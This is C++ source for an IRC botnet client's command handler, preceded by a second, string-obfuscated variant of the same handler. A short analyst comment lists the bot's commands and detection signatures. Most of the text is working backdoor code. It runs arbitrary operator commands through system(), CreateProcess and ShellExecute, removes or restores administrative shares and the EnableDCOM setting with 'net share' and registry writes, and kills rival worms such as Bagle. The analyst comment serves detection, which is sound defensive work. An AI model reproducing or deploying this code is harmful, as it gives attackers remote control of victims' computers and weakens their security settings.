sRndNick.Mid(0, 32).CStr()); return true; } // Run Command else if(!pMsg->sCmd.Compare(m_cmdCommand.sName.CStr())) { #ifdef WIN32 
if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false; CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false; CString sReplyBuf; sReplyBuf.Format("Executed: %s.", sText.CStr()); if(system(sText.CStr())==-1) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; } else { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; } #endif return true; } // System Information else if(!pMsg->sCmd.Compare(m_cmdSysInfo.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); } // Find Files //else if(!pMsg->sCmd.Compare(m_cmdFindFiles.sName.CStr())) // { /* CString strMask = pMsg->sChatString.Token(1, " "); CString strDir = pMsg->sChatString.Token(2, " "); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, FindFiles(strMask, strDir), pMsg->sReplyTo.Str()); */ //} // Change Nickname else if(!pMsg->sCmd.Compare(m_cmdNick.sName.CStr())) { g_cMainCtrl.m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr()); g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), g_cMainCtrl.m_sUserName.CStr()); return true; } // Uptime check (default: 7d) else if(!pMsg->sCmd.Compare(m_cmdLongUptime.sName.CStr())) { int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iDays) iDays=7; CString sUptime=LongUptime(iDays); if(sUptime.Compare("")) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ sUptime.Str(), pMsg->sReplyTo.Str()); } return true; } // Secure Bot else if(!pMsg->sCmd.Compare(m_cmdSecure.sName.CStr())) { #ifdef WIN32 CString regLoc; regLoc = dp(45,15,6,20,23,1,18,5,80,39,9,3,18,15,19,15,6,20,80,49,9,14,4,15,23,19,80,29,21,18,18,5,14,20,48,5,18,19,9,15,14,80,44,21,14,0).CStr(); HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128]; 
strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, dp(31,14,1,2,12,5,30,29,41,39,0).CStr(), NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(45,19,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(9,18,21,14,72,78,5,24,5,0).CStr()); CString tmpBagle; GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(9,18,21,14,72,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(18,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(),dp(9,69,69,18,73,72,14,72,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(19,19,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(23,9,14,19,25,19,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(23,9,14,19,25,19,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(4,71,4,21,16,4,1,20,5,78,5,24,5,0).CStr()); RegCloseKey(hkey); KillProcess(dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(2,2,5,1,7,12,5,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(46,1,19,11,39,15,14,0).CStr()); RegCloseKey(hkey); 
KillProcess(dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr()); GetSystemDirectory(tmpBagle.GetBuffer(MAX_PATH), MAX_PATH); tmpBagle.Format("%s\\%s",tmpBagle.CStr(), dp(20,1,19,11,13,15,14,78,5,24,5,0).CStr()); DeleteFile(tmpBagle); lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, regLoc.CStr(), 0, KEY_ALL_ACCESS, &hkey); RegDeleteValue(hkey, dp(31,24,16,12,15,18,5,18,0).CStr()); RegCloseKey(hkey); system("net share c$ /delete /y"); system("net share d$ /delete /y"); system("net share ipc$ /delete /y"); system("net share admin$ /delete /y"); #endif return true; } return false; }
// Analyst summary: core command dispatcher (variant with plaintext command names and the
// g_pMainCtrl pointer). pMsg->sCmd is compared against each literal in turn; the return value is
// false when nothing matches.
// Handlers visible here, in order:
//  - bot.remove / bot.removeallbut <id>: announces "removing bot...", then on Windows writes "Y" to
//    EnableDCOM under HKLM\Software\Microsoft\OLE, re-creates the c$, d$, e$, ipc$ and admin$ shares,
//    deletes the autostart registry value and/or service if enabled; finally calls
//    m_cInstaller.Uninstall() and stops the main loops. removeallbut returns early when <id>
//    matches this bot's bot_id.
//  - bot.execute <visible> <cmdline>: CreateProcess on Windows (environment variables expanded,
//    window shown or hidden), `/bin/sh -c "<cmdline>"` through system() elsewhere.
//  - bot.open: ShellExecute "open" on Windows, system() elsewhere.
//  - bot.dns: forward or reverse lookup of the argument, result sent to sReplyTo.
//  - bot.about / bot.id / bot.sysinfo / bot.status / bot.longuptime: informational replies.
//  - bot.nick / bot.rndnick: change the IRC nickname (truncated to 32 characters).
//  - bot.quit / bot.die: stop the IRC loop.
//  - bot.flushdns: runs "ipconfig.exe /flushdns" on Windows, "nscd -i hosts" elsewhere.
//  - bot.secure / bot.unsecure: Windows only; write "N" / "Y" to EnableDCOM and delete / re-create
//    the administrative shares through "net share", then report "Bot Secured" / "Bot UnSecured".
//  - bot.command: Windows only; passes the remainder of the chat string to system().
// Detection: the literal command names and reply strings above are usable as network or memory
// signatures; on the host, look for "net share <name>$ /delete /y" or "net share <name>$=<drive>:\"
// process creation and for changes to EnableDCOM under HKLM\Software\Microsoft\OLE.
// NOTE(review): the operator-supplied text reaches CreateProcess, ShellExecute and system()
// unfiltered, and no authorisation check appears inside this function; it presumably happens in
// the caller - confirm.
bool CBot::HandleCommand(CMessage *pMsg) { if(!pMsg->sCmd.Compare("bot.remove") || !pMsg->sCmd.Compare("bot.removeallbut")) { CString sId(pMsg->sChatString.Token(1, " ", true)); if(!pMsg->sCmd.Compare("bot.removeallbut")) if(!sId.Compare(g_pMainCtrl->m_cBot.bot_id.sValue)) return false; g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "removing bot...", pMsg->sReplyTo); #ifdef WIN32 /// should unsecure system as remove bot to allow recycling // // Set EnableDCOM to "Y" HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128]; strcpy(szDataBuf, "Y"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); // UnSecure Shares Execute("net.exe", "net share c$=c:\\"); Execute("net.exe", "net share d$=d:\\"); Execute("net.exe", "net share e$=e:\\"); Execute("net.exe", "net share ipc$"); Execute("net.exe", "net share admin$"); // Delete Autostart if(g_pMainCtrl->m_cBot.as_enabled.bValue) g_pMainCtrl->m_cInstaller.RegStartDel(g_pMainCtrl->m_cBot.as_valname.sValue); if(g_pMainCtrl->m_cBot.as_service.bValue) g_pMainCtrl->m_cInstaller.ServiceDel(g_pMainCtrl->m_cBot.as_service_name.sValue); #endif g_pMainCtrl->m_cInstaller.Uninstall(); g_pMainCtrl->m_cIRC.m_bRunning=false; g_pMainCtrl->m_bRunning=false; } else if(!pMsg->sCmd.Compare("bot.execute")) { CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1; #ifdef WIN32 CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables sText.Assign(sTextExp); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb=sizeof(sinfo); if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE; if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, 
&sinfo, &pinfo)) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute file.", pMsg->sReplyTo.Str()); return false; } #else CString sCmdBuf; sCmdBuf.Format("/bin/sh -c \"%s\"", sText.CStr()); if(system(sCmdBuf.CStr())==-1) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute file.", pMsg->sReplyTo.Str()); return false; } #endif return true; } else if(!pMsg->sCmd.Compare("bot.open")) { if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false; CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false; #ifdef WIN32 bRet=(int)ShellExecute(0, "open", sText.CStr(), NULL, NULL, SW_SHOW)>=32; #else bRet=system(sText.CStr())>0; #endif if(bRet) return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str()); else return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't open file.", pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.dns")) { CString sReply; hostent *pHostent=NULL; in_addr iaddr; if(!pMsg->sChatString.Token(1, " ").Compare("")) return false; unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr()); if(addr!=INADDR_NONE) { pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET); if(pHostent) { sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name); return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } else { pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr()); if(pHostent) { iaddr=*((in_addr*)*pHostent->h_addr_list); sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr)); return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } if(!pHostent) { sReply.Format("couldn't resolve host \"%s\"!", pMsg->sChatString.Token(1, " ").CStr()); return 
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } else if(!pMsg->sCmd.Compare("bot.about")) { CString sReplyBuf; sReplyBuf.Format("%s", g_pMainCtrl->m_sNameVerStr.CStr()); return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.id")) { return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.nick")) { g_pMainCtrl->m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr()); g_pMainCtrl->m_cIRC.SendRawFormat("NICK %s\r\n", g_pMainCtrl->m_sUserName.CStr()); return true; } else if(!pMsg->sCmd.Compare("bot.quit") || !pMsg->sCmd.Compare("bot.die")) { g_pMainCtrl->m_cIRC.m_bRunning=false; return true; } else if(!pMsg->sCmd.Compare("bot.sysinfo")) { return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.longuptime")) { int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iDays) iDays=7; CString sUptime=LongUptime(iDays); if(sUptime.Compare("")) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ sUptime.Str(), pMsg->sReplyTo.Str()); } return true; } else if(!pMsg->sCmd.Compare("bot.status")) { return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, Status().Str(), pMsg->sReplyTo.Str()); } else if(!pMsg->sCmd.Compare("bot.rndnick")) { CString sRndNick=RndNick(si_nickprefix.sValue.CStr()); g_pMainCtrl->m_cIRC.SendRawFormat("NICK %s\r\n", sRndNick.CStr()); g_pMainCtrl->m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr()); return true; } else if(!pMsg->sCmd.Compare("bot.flushdns")) { #ifdef WIN32 Execute("ipconfig.exe", "/flushdns"); #else Execute("nscd", "-i hosts"); #endif // WIN32 return true; } else if(!pMsg->sCmd.Compare("bot.secure")) { #ifdef WIN32 // Set EnableDCOM to "N" HKEY hkey=NULL; DWORD dwSize=128; char 
szDataBuf[128]; strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); // Secure Shares system("net share c$ /delete /y"); system("net share d$ /delete /y"); system("net share ipc$ /delete /y"); system("net share admin$ /delete /y"); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Bot Secured", pMsg->sReplyTo.Str()); #endif return true; } else if(!pMsg->sCmd.Compare("bot.unsecure")) { #ifdef WIN32 // Set EnableDCOM to "Y" HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128]; strcpy(szDataBuf, "Y"); dwSize=strlen(szDataBuf); LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey); RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize); RegCloseKey(hkey); // UnSecure Shares system("net share c$=c:\\"); system("net share d$=d:\\"); system("net share e$=e:\\"); system("net share ipc$"); system("net share admin$"); g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \ "Bot UnSecured", pMsg->sReplyTo.Str()); #endif return true; } else if(!pMsg->sCmd.Compare("bot.command")) { #ifdef WIN32 if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false; CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false; CString sReplyBuf; sReplyBuf.Format("command (%s) executed.", sText.CStr()); if(system(sText.CStr())==-1) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute command.", pMsg->sReplyTo.Str()); return false; } else { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; } #endif return true; } return false; }